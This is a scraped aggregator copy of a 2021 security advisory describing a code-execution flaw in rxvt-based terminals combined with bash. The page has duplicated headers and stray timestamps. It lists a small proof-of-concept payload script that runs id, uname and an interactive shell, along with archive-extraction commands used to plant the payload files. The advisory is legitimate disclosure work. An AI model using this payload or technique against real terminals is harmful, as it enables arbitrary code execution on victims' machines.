8
(u)rxvt terminal (+bash) remoteish code execution 0day
source link: https://huumeet.info/~def/rxvt0day/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
(u)rxvt terminal (+bash) remoteish code execution 0day
Date: 2021-04-20 (updated 2021-05-18)
Author: def <[email protected]>
Threads: oss-security
CVE: N/A
(u)rxvt terminal (+bash) remoteish code execution 0day
Version: rxvt 2.7.10, rxvt-unicode 9.22, mrxvt 0.5.4, aterm 1.0.1, eterm 0.9.7Date: 2021-04-20 (updated 2021-05-18)
Author: def <[email protected]>
Threads: oss-security
CVE: N/A
Prerequisites
- rxvt, rxvt-unicode or other rxvt-based terminal
- bash shell. It is possible to target at least ksh as well, but zsh probably not
- User interaction! The victim must enter a command to run a program✱ that ...
- plants attacker's payload file(s) in a subdirectory of the current directory
- outputs text containing ANSI escape sequences which trigger the code execution
Payload (planted as ZZZ/0, ZZZ/1 and/or ZZZ/Z0 in the PoC exploits)
#!/bin/sh
uname -a && id && date && /bin/sh -i
scp -r exploit@server:/backup/ .
00:00
unrar x exploit.rar
00:00
busybox tar -xvf exploit.tar
00:00
Note: GNU tar is not exploitable due to proper escaping of ANSI escape sequences in filenames!
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK